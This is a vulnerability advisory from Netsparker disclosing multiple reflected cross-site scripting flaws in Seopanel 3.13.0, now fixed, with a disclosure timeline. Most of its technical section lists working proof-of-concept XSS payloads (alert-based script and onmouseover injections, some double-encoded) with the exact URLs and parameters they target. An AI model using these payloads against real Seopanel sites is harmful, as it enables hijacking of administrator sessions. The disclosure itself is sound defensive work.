Multiple Reflected Cross-site Scripting Vulnerabilities in Seopanel 3.13.0 Information -------------------- Advisory by Netsparker Name: Reflected Cross-site Scripting Vulnerabilities in Seopanel Affected Software: Seopanel Affected Versions: 3.13.0 Homepage: https://www.seopanel.in Vulnerability: Multiple Reflected Cross-site Scripting Vulnerabilities Severity: Medium Status: Fixed CVSS Score (3.0): 6.3 Netsparker Advisory Reference: NS-18-022 Technical Details -------------------- URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=show&nsparameter=aa');alert(1)// Paremeter Name: nsparameter Parameter Type: GET Attack Pattern: aa');alert(1)// URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?%27%2balert(0x00BCA2)%2b%27 Parameter Name: Query Based Parameter Type: Query String Attack Pattern: %27%2balert(0x00BCA2)%2b%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=%27%252Balert(9)%252B%27&description=&keywords= Parameter Name: title Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=%2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x00B7E7%2529%253C%252FscRipt%253E&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords= Parameter Name: sec Parameter Type: GET Attack Pattern: %2527%2522--%253E%253C%252Fstyle%253E%253C%252FscRipt%253E%253CscRipt%253Ealert%25280x00B7E7%2529%253C%252FscRipt%253E URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=3&nsextt=%27%252Balert(9)%252B%27 Parameter Name: nsextt Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=%27%252Balert(9)%252B%27&search_name=&stscheck=select Parameter Name: keyword Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=%27%252Balert(9)%252B%27&url=http%3A%2F%2F&title=&description=&keywords=&search_name=&stscheck=select Parameter Name: name Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=&keywords=&search_name=%27%252Balert(9)%252B%27&stscheck=select Parameter Name: search_name Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=3&%27%2balert(0x0105C0)%2b%27=nsextt Parameter Name: nsparamname Parameter Type: GET Attack Pattern: %27%2balert(0x0105C0)%2b%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=%27%252Balert(9)%252B%27&sec=activate&theme_id=2&pageno= Parameter Name: start_script Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=%27%252Balert(9)%252B%27&stscheck=3 Parameter Name: userid Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=%27%252Balert(9)%252B%27&title=&description=&keywords= Parameter Name: url Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?search_name=Smith&userid=1&stscheck=%27%252Balert(9)%252B%27 Parameter Name: stscheck Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=themes-manager&sec=activate&theme_id=2&pageno=%27%252Balert(9)%252B%27 Parameter Name: pageno Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?sec=create&userid=1&name=&url=http%3A%2F%2F&title=&description=%27%252Balert(9)%252B%27&keywords= Parameter Name: description Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/admin-panel.php?menu_selected=themes-manager&start_script=themes-manager&sec=activate&theme_id=%27%252Balert(9)%252B%27&pageno= Parameter Name: theme_id Parameter Type: GET Attack Pattern: %27%252Balert(9)%252B%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/directories.php?sec=directorymgr&dir_name=&stscheck=1&capcheck=x%22%20onmouseover%3dalert(0x00BAF1)%20x%3d%22&pagerank=&langcode= Parameter Name: capcheck Parameter Type: GET Attack Pattern: x%22%20onmouseover%3dalert(0x00BAF1)%20x%3d%22 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/seo-plugins-manager.php?sec=listinfo&pid=1&pageno=x%22%20onmouseover%3dalert(0x00EC00)%20x%3d%22 Parameter Name: pageno Parameter Type: GET Attack Pattern: x%22%20onmouseover%3dalert(0x00EC00)%20x%3d%22 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/settings.php?category=x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22 Parameter Name: category Parameter Type: GET Attack Pattern: x%22%20onmouseover%3dalert(0x00B43C)%20x%3d%22 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/themes-manager.php?sec=activate&theme_id=2&pageno=%27%2balert(0x018E52)%2b%27 Parameter Name: pageno Parameter Type: GET Attack Pattern: %27%2balert(0x018E52)%2b%27 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot Parameter Name: search_name Parameter Type: POST Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot Parameter Name: report_type Parameter Type: POST Attack Pattern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22 URL: http://testcases-vdb.ns.local:8081/seopanel/seopanel-3.13.0/?'"--> Parameter Name: Query Based Parameter Type: Query String Attack Patern: '"--> URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/index.php?'"--> Parameter Name: Query Based Parameter Type: Query String Attack Patern: '"--> URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot Parameter Name: code Parameter Type: POST Attack Patern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?'"--> Parameter Name: Query Based Parameter Type: Query String Attack Patern: '"--> URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/login.php?sec=forgot Parameter Name: email Parameter Type: POST Attack Patern: x%22+onmouseover%3dnetsparker(0x00497F)+x%3d%22 URL: http://{DOMAIN}/{PATH-OF-SEOPANEL}/support.php?'"--> Parameter Name: Query Based Parameter Type: Query String Attack Patern: '"--> For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS). Advisory Timeline -------------------- 28th June 2018- First Contact 13th September 2018 - Vendor Fixed 30th November 2018 - Advisory Released Credits & Authors -------------------- These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner. About Netsparker -------------------- Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.